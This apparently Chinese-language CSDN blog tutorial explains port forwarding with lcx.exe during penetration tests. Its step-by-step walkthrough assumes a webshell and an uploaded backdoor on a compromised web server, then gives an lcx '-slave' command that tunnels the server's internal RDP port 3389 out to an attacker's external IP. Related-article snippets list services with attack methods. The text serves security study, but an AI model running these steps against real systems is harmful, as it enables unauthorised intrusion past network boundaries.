渗透测试过程中的端口转发

最新推荐文章于 2024-04-09 11:13:28 发布
最新推荐文章于 2024-04-09 11:13:28 发布
阅读量1.2k 收藏
点赞数
分类专栏: Web 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43915762/article/details/88832328
版权
先来介绍一下端口转发工具:lcx.exe

在这里插入图片描述
有三种用法:

  • -listen:监听本机的某个端口,并将其转发到本机的另一个端口。
    如:lcx.exe -listen 888 999,即监听本机的 888 端口,并将其监听到的数据转发到 999 端口。

  • -tran:将某个端口转发到本机任何一个地址的某个端口。
    如:lcx.exe -tran 8888 127.0.0.1 3389,即将本机的 3389 端口转发为本机任何一个地址的 8888 端口。这个可以在当某个服务只允许本机的 127.0.0.1 去访问时进行使用,当输入这条命令后,就可以通过 Web 服务器的 IP 地址或者 网站网址的某个端口进行连接服务,而不限于 127.0.0.1

  • -slave:将内网的某个主机的某个端口,转发到外网某个主机的某个端口上。lcx.exe -slave 外网IP 外网端口 内网IP 内网端口
    如:lcx.exe -slave 200.1.1.1 888 192.168.1.2 3389,即将局域网内 IP 地址为 192.168.1.2 的 3389 端口转发到外网 IP 为 200.1.1.1 的 888 端口上,这样就可以进行连接。

利用端口转发连接内网服务器的 3389

假设 Web 服务器的内网 IP 为 192.168.1.2。

① 先得到 webshell 权限,上传大马。

② 通过大马,上传一个 lcx.exe 端口转发工具。lcx.exe 是一个命令行工具,需要在命令行中使用。可以在大马中的命令执行界面进行执行。

③ 执行命令:
lcx.exe -slave 200.1.1.1 8888 192.168.1.2 3389
注意:

  1. 若攻击者主机是一个外网 IP,那么 200.1.1.1 处可以填写 攻击者主机的外网 IP;
  2. 若攻击者的主机是在内网中,那么 200.1.1.1 处应该写攻击者与外网相连的路由器的外网 IP 地址
  3. 若攻击者的主机是在内网中,那么 200.1.1.1 处也可以填写服务器与外网相连的路由器的外网 IP 地址,那么攻击者就可以通过连接 Web 服务器该路由器的 IP地址+转发后的端口(如 8888) 来连接服务器的 3389 端口

④ 若攻击者在内网中,且端口是转发到攻击者的内外网处的路由器的 IP 地址和端口上,那么需要配置该路由器的端口转发。即将转发到外网某个端口的数据转发到内网某 IP 地址的某个端口下。
在这里插入图片描述

⑤ 攻击者本地的主机也需要侦听:
lcx.exe -listen 1111 1311
将转发到本地 1111 端口的数据转发到 1311 上。

通过以上步骤,远程服务器的 3389 端口通过端口转发,将数据转发到了攻击者本地主机的 1111 端口;在本地侦听 1111 端口的同时,将数据又转发到了 1311 端口;那么就可以通过连接本地的 1311 端口就可以连接远程服务器。

YT--98
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SSH端口转发及检测
vlogFeynman的博客
05-28 673
0x01 -D local dynamic application-level port forwarding ssh -qTfnN -D local-port user@ip 浏览器开启socks代理 启用端口转发前 访问域名可以看到是本机的IP 启用端口转发后 访问域名可以得到代理的IP 特征 如果参数指定了 -T 禁止远程分配终端 则在被连接机器上 ssh进程无子进程 80 443 的 网络连接由ssh进程发起 3. ssh进程文件描述符打开管道 0x02 -L Speci
ngrok端口转发应用程序
04-16
**ngrok端口转发应用程序详解** ...总之,ngrok作为一个高效的端口转发工具,其简洁的使用方式和良好的安全性使其在IT行业深受青睐。然而,正确理解和合理使用是保障安全的关键,务必谨慎处理公开暴露的服务。
渗透测试】内网渗透端口转发
MachineGunJoe666
07-09 1345
一、内网渗透端口转发 需要知道,在渗透的整个流程,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程参考了很多前辈们的宝贵经验,我把这些链接进行了收集,放在参考文献部分。 二、转发,映射,代理 这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。但是究其本质还是存在不小的差别的
渗透测试笔记】之【端口转发
AA8j的博客
08-06 599
实验环境配置 配置monowall 防火墙及XP 防火墙模拟的内网和外网的分界线,XP模拟的内网主机。 下载monowall: https://archive.org/download/generic-pc-1.8.1 新建monawall 虚拟机,添加一块网卡,将网卡一配置为主机模式(模拟内网),网卡二桥接到物理网络(模拟外网) 首次启动按7 安装到硬盘 安装完后按1配置接口,提示是否配置VLAN,输入n;接着叫输入LAN 接口名称(模拟内网),输入第一块网卡对应名称,这里是le0;WAN接口即为le
内网渗透-端口转发
weixin_44110913的博客
10-18 1214
目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道)  EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理(Linux)​ Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 LCX实现本地端口转发(Windows的场景) LCX实...
渗透测试笔记】之【SSH 端口转发、socks代理及X协议转发】
AA8j的博客
08-09 927
模拟环境:内网一台Linux 主机只能访问外网的53端口,将此主机的SSH 转发给外网的kali,通过kali 再转发给其它服务器(Windows2003) 配置防火墙 同上一篇端口转发配置。 配置kali 网卡桥接到物理网络模拟外网。 开机后kali默认关闭了所有服务,需要开启ssh: service ssh start 注:默认ssh不能连接root,且ssh默认端口为22,需要更改配置 vi /etc/ssh/sshd_config 将 #Port 22 取消注释并改为53 启动ssh,并查看是
渗透测试笔记.rar
02-25
4. **渗透测试技巧**:书可能涵盖了一些高级技巧,如社会工程学、密码破解、端口转发、隐蔽通信和反取证技术。这些技巧可以帮助测试者更有效地模拟攻击,发现潜在的安全漏洞。 5. **Payloads和Exploits**:在...
Android渗透测试之adb介绍与使用详解
02-04
**三、adb在渗透测试的应用** 1. **权限获取**:渗透测试人员常利用adb执行`su`命令获取设备的超级用户权限,以检查或修改系统级别的安全设置。 2. **漏洞检测**:通过adb发送自定义的系统命令或应用调用来探测...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
VulnHub靶场MONEYBOX:1
01-05
在安装过程,需要配置网络和端口转发等设置,以便在本地环境运行虚拟机并连接到靶场。 总之,VulnHub靶场MONEYBOX:1是一个非常实用的学习资源,可以帮助安全爱好者提高渗透测试和漏洞利用的技能。但是需要注意...
渗透测试端口利用总结
Phoebus2617的博客
04-26 255
信息收集必备 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 爆破/嗅探/溢出/后门 22 ssh远程连接 爆破/openssh漏洞 23 Telnet远程连接 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 67/68 dhcp服务 劫持/欺骗 110 pop3 爆破/嗅探 139 Samba服务 爆破/未授权访问/远程命令执行 143 Imap协议 爆破 161 SN
渗透测试的常见端口
weixin_47660694的博客
12-09 542
渗透测试的常见端口
渗透测试常见的端口
weixin_50464560的博客
07-18 1381
渗透测试常见的端口 在渗透端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口,也是笔者慢慢收集起来的,分享出来大家借鉴一下,也欢迎补充 1,web类(web漏洞/敏感目录) 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix  80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreS...
渗透测试常见端口总结
最新发布
2301_79977730的博客
04-09 1258
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口的攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程,网络上传输的用户和密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
渗透测试常见的端口及其服务
weixin_39445116的博客
12-29 490
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞。9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞。在渗透端口扫描的收集主机那些服务很重要,这里收集到一些常见的的服务端,如果不知道端口服务是什么可以查找下面的内容。7001,7002 WebLogic默认弱口令,反序列。7001,7002 WebLogic默认弱口令,反序列。
渗透测试——常见服务端口及对应的漏洞汇总
W小哥
11-17 5334
一、web服务类 tomcat--80/8080/8009 manager弱口令(漏洞利用可以上传war包getshell) put上传webshell HTTP慢速攻击 ajr文件包含漏洞-CVE-2020-1938 Jboss--8080 后台弱口令 console后台部署war包 JAVA反序列化 远程代码执行 webSphere--9080
渗透测试面试常用端口大全
broing55的博客
04-21 3677
0 无效端口,通常用于分析操作系统 1 传输控制协议端口服务多路开关选择器 2 管理实用程序 3 压缩进程 5 远程作业登录 7 回显 9 丢弃 11 在线用户 13 时间 17 每日引用 18 消息发送协议 19 字符发生器 20 FTP文件传输协议(默认数据口) 21 FTP文件传输协议(控制) 22 S...
渗透测试常见端口号、服务
tempulcc的博客
09-21 1263
常用端口号及服务文件共享端口远程连接服务端口web应用服务端口数据库服务端口邮件服务端口网络常见协议端口特殊服务端口 在渗透测试过程,对端口的信息收集是一个重要的步骤,所以了解以下常用端口对应的服务十分有必要 文件共享端口 端口号 说明 使用方向 21/22/69 FTP/Tftp文件传输协议 允许匿名的上传、下载、爆破和嗅探操作 2049 NFS服务 配置不当,敏感文件泄露 139 Samba服务 爆破、未授权访问、远程代码执行 389 Ldap目录访问协议 注入、允许匿名访
渗透测试常见开放端口及利用
anlalu233的博客
03-05 501
https://www.cnblogs.com/iAmSoScArEd/p/10564262.html
内网渗透技术:LCX、Htran、ReDuh端口转发实验详解
"该文档是关于内网渗透的实验手册,涵盖了LCX、Htran.exe和ReDuh等工具的端口转发实验,目的是教授如何进行内网渗透测试和搭建练习环境。" 在网络安全领域,内网渗透是评估组织安全防御能力的重要环节,通常涉及到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值